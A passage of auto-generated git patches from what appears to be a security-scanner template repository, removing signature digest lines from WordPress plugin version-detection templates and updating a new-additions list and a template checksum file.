4b0a00483046022100c63893e04cc352c2091b34940eb8383d93ccf6e471e8c54e92918107fbf09f32022100b8e7f07472343b3027a325d92d12027e810096ed005c64ecad59b67bc28cd032:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 41158374f2..b9bd4be0a8 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202cb9c2db67ac9534108d8c6b1406a97e10352c489efb70e6dda5e5a9333a413f02205f59c15415a540019377ea31645e3912fbc27f32a0df6a123f9b10ee47a9e874:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 0b1d518d54..bece4ce486 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205dbf48063486a8907f70f9c402566807d57f2364135d741e5bb5d873dafb9635022100ecff212620107fffd44dc5b2bd707c0a47f6b39e431dde17fd6e32528534f42c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 8e5a8699cc..138b0aa9a6 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220518067e1e70ce52300a43e6d9ff6791c7101b8f5538ffba112ae559247a784a7022035c7c171c3488ed33d4f341bc7fee48c27e9f6463948316edb90a3e3801eb0d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 927904a5fb..68bf71bc83 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022077aed1e06cfdacc3acb70d82ab0326e8cf64d7c38e2fe8a819e0afe80e8aedaf02204543ac4ad8756ed3518e055c0a2da4c7c38617a7e8c50a55aa9c01943b6597cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index c33f5eb803..10dad2d2fb 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205fe6f26454b19385a761743d368ab1986f373387c254612249dcfec92a31f34402204799bf5273cecebafd03f9af758a8182f89b8340db1a67bfa38820fd81ff74c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index 388cef737b..e9efe6fb53 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e8e1a8dbcd22ef8beb3981c739e7f3aa5f77749175654b30de9705dc79af5a35022032006c959ae363fb8cc658279887dc2df3ca7945ef4db8ef09cab67c4a14bdfb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 6a83958310..c3d10f0135 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022038be24b1471867a4e6559815e3734af2cb5c91fb5c0dee8306251b3dedebec52022100fac7e84f2787ec75419b7bb30036e16041ff69596b587c5ff95864002b4c0258:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 751d537eb8..4a8bc6b75c 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206977735801c3c11d3e448644ccf59f142bbb2d8fff5d546eb8d4e16581e59c70022008a8c9142d356126752ce4761836e77eb0804e25ea054225a2534772afbfe0fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index d2c6862e83..d2c74355bd 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d8daf0533cc32ae14ba756af1b1c29ebef8e9f8ab280f4d7bc3af3dc17de67e0022044d21d3be8398b5ed686abd4bd3a617502923defac1f8d866747646f6fedb0cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 74038a023d..94b8494b08 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220641d793612f24ca009d78b610511f19890a66e3e5e05e992500e58a841795044022100cfcf1f565b64c8aece68886e356c1039d4e2b2d4c736f55fb1660cc7d6c922da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 604302993d..108aba79e9 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022026791cd9acff1bf94d28588550e6e995fe8f948d22e8fa9a3309c9c7d5ca9e460221009ea0da672696cf2c4892935aea727f1ce03f1dde3106b1222c83e756eecdaffb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 5e6104a69c..f6f6bf5566 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220191d63150d7844b8db071f8a4cd08f82ed79eed2495a451bc816299736e3287d0220337eaa2521f80c5391de8bfe7f31dec8bce2886a45aaa3ca5697e38ca53d43c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index f42d9ccd4b..483cb7cac7 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022068403e553ab5ad172e906f56cec5e06516a9e495bc342600c8038038d32d848102200d96e8deabb4232f3f773d13340492fa30e586282ac9043347671fe242f585d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 81f3fc8a48..a132c98df4 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e4de1fecefab120ad66d3bb2cf8e4c04d2b3b3991001a0cfb685db556df51e1d0221009cd3bdbced580b6d02fde0dd3a5920c3f44ab8e14256b47fcd7bd58b89850817:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index e68beefa21..135bbee046 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fb9873ca96f4ffbed83bf32a4d711976e30b70000936c5b2c463e6269888417c02206f795632b80edd34f48125c997001a204350c685d233403236edeede678e5f72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index b000a9209a..5b690d96c0 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220764615f0f4d3063b2a603ea23420ad8b94e4f6a56877f52d0d592524b8023272022060324c935a152f8c0998091ac60a1b521ba1637ff081973af22e774b31c44434:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 47cd787135..16c7d6cff5 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009299b4b55776a3f4760ea93b478ff6bc1ac45ac6095b70695996446ba4ab3dbb022036622d2c3b9e46fcdd6ecae7fcf62adb957d98ce96dfd973c571db6afe86c305:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index 46c358532e..ab099f357e 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206bae4477bedd6ed4611ed53de9a1a084ef07642ee2bea7a41faf6ac3e27f49f7022100c828c32ac6d89f6effe09e893b169c317e25240a8cbe7501ed5055e06c32b1cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 108013b6f1..ad0b8f8fed 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200b865e41c8a831efd20a4afb60a782a7b8d6c1b45170cfb2787f73eb7e892c9b022100d5778966975d0459eb3dbd9af2ad4e9f2f5025144220e21d582fcfce281fb873:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index bb6e496fd3..58e5e828bf 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e41ffc2988cab642f91f6dcb57b06876592d07cb0baf910acfca44a05ccf031502206ed3d20ac42124f378c303c34f7417605427f07a8de70b37928a626311b80f9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index 48734b5653..f943c7afeb 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f3caea72888f8831d241de83afb55c4a148b3a1a79d96be19eb6e5ed4c3b2ba8022100d3cfe29194e339836ae4d6b871c7d6cbd586428441d2bc9a1f9ebda32a937e64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index b1fff898aa..062e5c85b4 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202a58e89becd2f5e42217eeaf19a41e393767675f04b6080b751af9a81f3986110220171fb9948f01e262e6b0a4170d542f05aed3e16cd01fe7cfb1e0780cfaab1a95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index d7450fb5da..6dcfdda117 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022023549d41310c42cb39723e7086c4a77a91e3e34eae4068a47ab756a1fc654eed02204f4dc090ac80f8a54c97a7bcd66a5f0cfe0597b7dbde140527b71068e9d46b31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From e1573daf184310f1a2e9c2f72075e1caf2c63bd6 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Fri, 28 Jun 2024 06:36:51 +0000 Subject: [PATCH 0704/1841] Auto Generated New Template Addition List [Fri Jun 28 06:36:51 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index b7430e64a1..295ea2d378 100644 --- a/.new-additions +++ b/.new-additions @@ -5,6 +5,7 @@ http/cves/2024/CVE-2024-37152.yaml http/cves/2024/CVE-2024-37881.yaml http/cves/2024/CVE-2024-6028.yaml http/exposures/configs/neo4j-neodash-config.yaml +http/misconfiguration/installer/kodbox-installer.yaml http/technologies/neo4j-neodash-detect.yaml http/vulnerabilities/backdoor/polyfill-backdoor.yaml http/vulnerabilities/next-js-cache-poisoning.yaml From c9046bd8823129fc20e6ad41fbf4d0fa6b952393 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 28 Jun 2024 06:37:05 +0000 Subject: [PATCH 0705/1841] Auto Generated Templates Checksum [Fri Jun 28 06:37:05 UTC 2024] :robot: --- templates-checksum.txt | 437 +++++++++++++++++++++-------------------- 1 file changed, 219 insertions(+), 218 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index b171b3c118..145f189763 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -733,7 +733,7 @@ helpers/wordpress/plugins/ad-inserter.txt:f877a4a8ab02364267e9ac08e5a43ed3eb6f22 helpers/wordpress/plugins/add-to-any.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/admin-menu-editor.txt:f84939ff21a1ffe63d6f3e405737228a6e174657 helpers/wordpress/plugins/adminimize.txt:ec155403800c88db49630516a63f68500f17d612 -helpers/wordpress/plugins/advanced-custom-fields.txt:e0e8632bccfe7cb1511a277abb9bd5fbc2e087a6 +helpers/wordpress/plugins/advanced-custom-fields.txt:a7fbd6d327737c06c4df75324d67f7a31797d931 helpers/wordpress/plugins/akismet.txt:fb52ada446f84acb5529ace8fe4f25e203a5dddb helpers/wordpress/plugins/all-404-redirect-to-homepage.txt:e5d05199b7d43b0bd203a9cf2e8e874dad4ff45f helpers/wordpress/plugins/all-in-one-seo-pack.txt:4a74356d25940a094bf92b6722f74e38e3ad55ec @@ -744,7 +744,7 @@ helpers/wordpress/plugins/antispam-bee.txt:ce256ecfbb665c5366c1669a3e7c3a24c65a6 helpers/wordpress/plugins/astra-sites.txt:9bab51b354b67876c6284de28df0e549940fb873 helpers/wordpress/plugins/astra-widgets.txt:386ef6797a9c4de50f240b16bd76bbeae35a5711 helpers/wordpress/plugins/autoptimize.txt:1889abba77b26fc1827431e5d46978a5e89769e6 -helpers/wordpress/plugins/backwpup.txt:66eed0a7a5e1364c307f42f580a7ff24e731f1a0 +helpers/wordpress/plugins/backwpup.txt:36442478f1f952d62cb89e1b634d5937a7d2863f helpers/wordpress/plugins/better-search-replace.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/better-wp-security.txt:3fe0b3c91b9dd2a6f57c0d1e7ec7c05ac3858661 helpers/wordpress/plugins/black-studio-tinymce-widget.txt:b74c052eec677c340bd7f99d94e1557d1f1d5e53 @@ -771,12 +771,12 @@ helpers/wordpress/plugins/creame-whatsapp-me.txt:08d2e98e6754af941484848930ccbad helpers/wordpress/plugins/creative-mail-by-constant-contact.txt:8a49e162e780f4c3a1d7e6f60cbfde4d5158004e helpers/wordpress/plugins/custom-css-js.txt:4ef690b935393e44a136931421e45fe50451b469 helpers/wordpress/plugins/custom-fonts.txt:c7e3a41454e034e5ad994df8bf12b61e9fb1e1bc -helpers/wordpress/plugins/custom-post-type-ui.txt:fcb074a94f4c6b8f87287f31608426312e7fb753 +helpers/wordpress/plugins/custom-post-type-ui.txt:4bfe61fd9e7ec461ff91963632ff470bd1264c1a helpers/wordpress/plugins/disable-comments.txt:2ae3ad2f93cb6bc93d15eedb93cdf5051262687b helpers/wordpress/plugins/disable-gutenberg.txt:7c49f6117c3f09ee90548ad70960b7a9b716deb8 helpers/wordpress/plugins/duplicate-page.txt:eb8938636fe209df72afeee0da7ccac88ff1f5b9 helpers/wordpress/plugins/duplicate-post.txt:59a7597c10f2e831aaf8a6526fb9a13e25ea680e -helpers/wordpress/plugins/duplicator.txt:157d57f2e8bde3f7ab25703a4e4a74dc578bd412 +helpers/wordpress/plugins/duplicator.txt:fa05bd88f39ee8582aa5f061e1b33c01a4907d22 helpers/wordpress/plugins/duracelltomi-google-tag-manager.txt:68c9b7f7107e58a492677237912410e7d28c994b helpers/wordpress/plugins/easy-fancybox.txt:fa2d8a9d18d35e9aa274b6d7d0ad0225d0362ed6 helpers/wordpress/plugins/easy-google-fonts.txt:775bbc46d0bc85e121db86ae12b2993ffedbb0ae @@ -806,7 +806,7 @@ helpers/wordpress/plugins/google-site-kit.txt:b112d64c12ea14bbfa5671fe7ac7af8d57 helpers/wordpress/plugins/google-sitemap-generator.txt:8219d4ef07eba68c05cb812b66a743661925aa25 helpers/wordpress/plugins/gtranslate.txt:16b08d6d2a65aa308add14852e0faea08001ef60 helpers/wordpress/plugins/gutenberg.txt:46b9aa433f3d21deebfa357ca15abf4190ceea0e -helpers/wordpress/plugins/happy-elementor-addons.txt:8365908e3026803300d1009572fe7bf474d0927b +helpers/wordpress/plugins/happy-elementor-addons.txt:d33f1fbbd8e02405d75783dfb145509ee6f51975 helpers/wordpress/plugins/header-and-footer-scripts.txt:bf64dd8c92190417a38d834b0c92eee4be757761 helpers/wordpress/plugins/header-footer-code-manager.txt:42c9dca141f2cd50ab7fcfa673255d29eac1fe9d helpers/wordpress/plugins/header-footer-elementor.txt:e1e19bc7267dd9c0a93903ac4803a7f52de3d1d6 @@ -824,14 +824,14 @@ helpers/wordpress/plugins/intuitive-custom-post-order.txt:d1fd48333115227b181b4b helpers/wordpress/plugins/iwp-client.txt:6c3371737e84ab4219f83867466569f042741c0c helpers/wordpress/plugins/jetpack-boost.txt:6296d4732b242d110df8dee2fc52e75587f5910b helpers/wordpress/plugins/jetpack.txt:a861c6358fded34510ab1962eb66230220d77942 -helpers/wordpress/plugins/kadence-blocks.txt:5a6afbb0d73a747e57b24cbb36f22da4692362e5 +helpers/wordpress/plugins/kadence-blocks.txt:fd6046ed3fca2ac2e25ef3324e07a62519e6531b helpers/wordpress/plugins/kirki.txt:9640fdbbae3c8e8f74e96e656f485284e8f8ed9d helpers/wordpress/plugins/leadin.txt:d4a4068d21627778d982b009ccde0601fc6647b8 helpers/wordpress/plugins/limit-login-attempts-reloaded.txt:3996adb4a5baf85b23093a06a6e8607146c2380c helpers/wordpress/plugins/limit-login-attempts.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/litespeed-cache.txt:3a108f8e498bd0c9790af41f7f7d8093515044ff helpers/wordpress/plugins/loco-translate.txt:0aa5278ef5ea1dbf030f22ea213474a6ac406d64 -helpers/wordpress/plugins/loginizer.txt:cd50e5150f44bd97a823ab2dd4155dd014f5f646 +helpers/wordpress/plugins/loginizer.txt:58d1d0c23163c61557bea4063c882aa0813ce1fa helpers/wordpress/plugins/loginpress.txt:4ea93c6a1e320054f99d66f428e611b31355cd92 helpers/wordpress/plugins/mailchimp-for-woocommerce.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/mailchimp-for-wp.txt:0ef6ca3504757e440dbb7f74dfc7956540130d09 @@ -844,7 +844,7 @@ helpers/wordpress/plugins/members.txt:2beef4f1a38f9db1c05a1e49977c956626624d66 helpers/wordpress/plugins/meta-box.txt:193731126fc28e1c2848ea069e492a3a46c5fcf4 helpers/wordpress/plugins/metform.txt:714503a3af828a0db664fd44681d548aba3ee3a7 helpers/wordpress/plugins/ml-slider.txt:80ed6599146b54137db225fcbb582290d8512149 -helpers/wordpress/plugins/newsletter.txt:4b84a805a8aa871bbce0fa320591b0526c93757d +helpers/wordpress/plugins/newsletter.txt:806b01f722148eb1b6ddf37464ad8f18232e6422 helpers/wordpress/plugins/nextend-facebook-connect.txt:f6eab21f4096ab86124a60f5d8ae48626e598de9 helpers/wordpress/plugins/nextgen-gallery.txt:8c695bf155c8053505aaa583b04fbde1a8491860 helpers/wordpress/plugins/ninja-forms.txt:a16cd18f1019f04b207109b189b504edbde41ab2 @@ -862,7 +862,7 @@ helpers/wordpress/plugins/pixelyoursite.txt:0b613b1113c478fd8e9cb11573a0ce72f209 helpers/wordpress/plugins/polylang.txt:634ac7a7e33e6dc123884fef23157c442970fb87 helpers/wordpress/plugins/popup-builder.txt:8b367cc24dc19d310f9af1157021067beef77465 helpers/wordpress/plugins/popup-maker.txt:c25ed33c251bfc15583cad11462f17a56e46989d -helpers/wordpress/plugins/post-smtp.txt:70063a963fc1c0d2b47b3999fb871391747f74b9 +helpers/wordpress/plugins/post-smtp.txt:e3ed60a025d245a507278b5f3586e23e4ead67eb helpers/wordpress/plugins/post-types-order.txt:f243f3446bb1226eacba3cdb8b904ef729d6ec9d helpers/wordpress/plugins/premium-addons-for-elementor.txt:e84ad28997bf6ae8ece163b8b89ecd5f073ccae6 helpers/wordpress/plugins/pretty-link.txt:e45ae12a7326100f6ce5fbc5ad2c1260c5d71d13 @@ -871,8 +871,8 @@ helpers/wordpress/plugins/really-simple-ssl.txt:d97823538c9ba6289bac6fea78445ad9 helpers/wordpress/plugins/redirection.txt:1d9a9eb3723d36c07bbcef114c168744dedfa05e helpers/wordpress/plugins/redux-framework.txt:0ad85a556e9d4c9fd4bb8da0f81f4d28b598587b helpers/wordpress/plugins/regenerate-thumbnails.txt:aba31d0ba474d83f50978833d17946c355cb20c4 -helpers/wordpress/plugins/royal-elementor-addons.txt:6d620af1c20dcb1dfc911c1dded7bf70bbd30c8a -helpers/wordpress/plugins/safe-svg.txt:47ac56ccfa5b6db61c32cb48c2dda8cc64d242cb +helpers/wordpress/plugins/royal-elementor-addons.txt:7bed2a141156e4ba7df86140b29e73a2f48c1f0a +helpers/wordpress/plugins/safe-svg.txt:5da596d45f9d6516efc24f110a7c87475a984016 helpers/wordpress/plugins/seo-by-rank-math.txt:5bf51483cdbf6af88985eb92aeb46c696e503716 helpers/wordpress/plugins/sg-cachepress.txt:04035664301b06859586cb750fd8f8ad988856ea helpers/wordpress/plugins/sg-security.txt:3591720dc29efed55da59e353bbd1e1ad90dedf6 @@ -894,11 +894,11 @@ helpers/wordpress/plugins/table-of-contents-plus.txt:412a33ae14746612317b013dc23 helpers/wordpress/plugins/tablepress.txt:c83b2e9f55420fa41efd48e4a45103566c9e4767 helpers/wordpress/plugins/taxonomy-terms-order.txt:d176141136f1fe969aeca56eb98e3734f24199ae helpers/wordpress/plugins/templately.txt:08d2e98e6754af941484848930ccbaddfefe13d6 -helpers/wordpress/plugins/the-events-calendar.txt:efb11eb82b4282760409042dd3fd4bff129bbec9 +helpers/wordpress/plugins/the-events-calendar.txt:44dbfaa714938949bc31889d586fe82bf4c0cd84 helpers/wordpress/plugins/themeisle-companion.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/tinymce-advanced.txt:93ab266c89e9dcb536484607a605b05e657be940 helpers/wordpress/plugins/translatepress-multilingual.txt:0aaa3cea7451675ff270540e13308210d8fce9ab -helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt:43d658fcb5e8bd6cac245dd878e485a7651c9a4f +helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt:efeb47fd41d5443772275287ca2523cab8bc0139 helpers/wordpress/plugins/under-construction-page.txt:17bb8bf9f231900aaec8e0d2788c3fa060ef1c5c helpers/wordpress/plugins/unyson.txt:08105b9ddd906ead00c6c2b76a45ffa54f0efc2d helpers/wordpress/plugins/updraftplus.txt:e8615588a2454d2d3d48934cdf103f3177c30c37 @@ -941,12 +941,12 @@ helpers/wordpress/plugins/wp-seopress.txt:60d712d9a12f5416daabb3565821281c3cba1d helpers/wordpress/plugins/wp-sitemap-page.txt:b600bf3dacb5d620338f6412a343d3349ec570bf helpers/wordpress/plugins/wp-smushit.txt:c7f53e91bcbfae4c21042e9d0833d24ed2cfc08c helpers/wordpress/plugins/wp-statistics.txt:eaf1c1bdfba4abe49a572dfe88b7618f7fedd9f4 -helpers/wordpress/plugins/wp-super-cache.txt:e2f2e225c4ff1ca0a8c0083ca61d7e9717bb61d5 +helpers/wordpress/plugins/wp-super-cache.txt:f84939ff21a1ffe63d6f3e405737228a6e174657 helpers/wordpress/plugins/wp-user-avatar.txt:a7bfba4c08f393aabc53a4392dbd6b3d0f13baaa helpers/wordpress/plugins/wpcf7-recaptcha.txt:c3000a6db3b2781a189fbfaa91a73e6d63d567c9 helpers/wordpress/plugins/wpcf7-redirect.txt:e533a0ddf49ac25eb565f7786d75249e411bd53a -helpers/wordpress/plugins/wpforms-lite.txt:62156312501df259d1213db5481c36daaa321adc -helpers/wordpress/plugins/wps-hide-login.txt:1be4fc9641c219c2994e21840fa082208b93c1aa +helpers/wordpress/plugins/wpforms-lite.txt:65b63da7547962e59c98dcf1e2db069084362d55 +helpers/wordpress/plugins/wps-hide-login.txt:51a2a1f09e1587e93a965d8ae52c2309477eba45 helpers/wordpress/plugins/wpvivid-backuprestore.txt:59d7e64657a8b97484f080d8c51a6652e22d2a14 helpers/wordpress/plugins/yith-woocommerce-compare.txt:fc4929308af8b80845b3c743a30013a669a02875 helpers/wordpress/plugins/yith-woocommerce-wishlist.txt:bac19d8941e404675dba7142fecdc9ea1f371ad9 @@ -3452,7 +3452,7 @@ http/cves/2024/CVE-2024-3552.yaml:0994d94f6f8b7ea5f3774e6b4fbc542a57369f6e http/cves/2024/CVE-2024-36412.yaml:3dab338da4cd060aacc90a2c21159bf56c95bdff http/cves/2024/CVE-2024-36527.yaml:eb2651a0ee32128fdfe8ae24c72f5d61a1a7f68e http/cves/2024/CVE-2024-36837.yaml:65450880230a57a47c4dbf8b268af022ab009189 -http/cves/2024/CVE-2024-37152.yaml:02150d12db05f3fcd6cdeb2d238455022899f9d5 +http/cves/2024/CVE-2024-37152.yaml:45b7e5ca110853fe4cca80588d33d140f611d1e2 http/cves/2024/CVE-2024-37393.yaml:c7cac02b06ca12c407122ea2fff033456006d7dd http/cves/2024/CVE-2024-37881.yaml:060af3bf51e4ab05684d4923658d02b3c49583bb http/cves/2024/CVE-2024-3822.yaml:2dd9c56b09c0619afb49b80cbcb5979b3eae5a1c @@ -5628,6 +5628,7 @@ http/misconfiguration/installer/joomla-installer.yaml:3c61ec0cf21b65088e1392f2f5 http/misconfiguration/installer/justfans-installer.yaml:a0589926d5a3ca938dd300000c6e260ba8ffe7f2 http/misconfiguration/installer/klr300n-installer.yaml:417ba88bb2ce1a6aced0dfacfa77021a62f73487 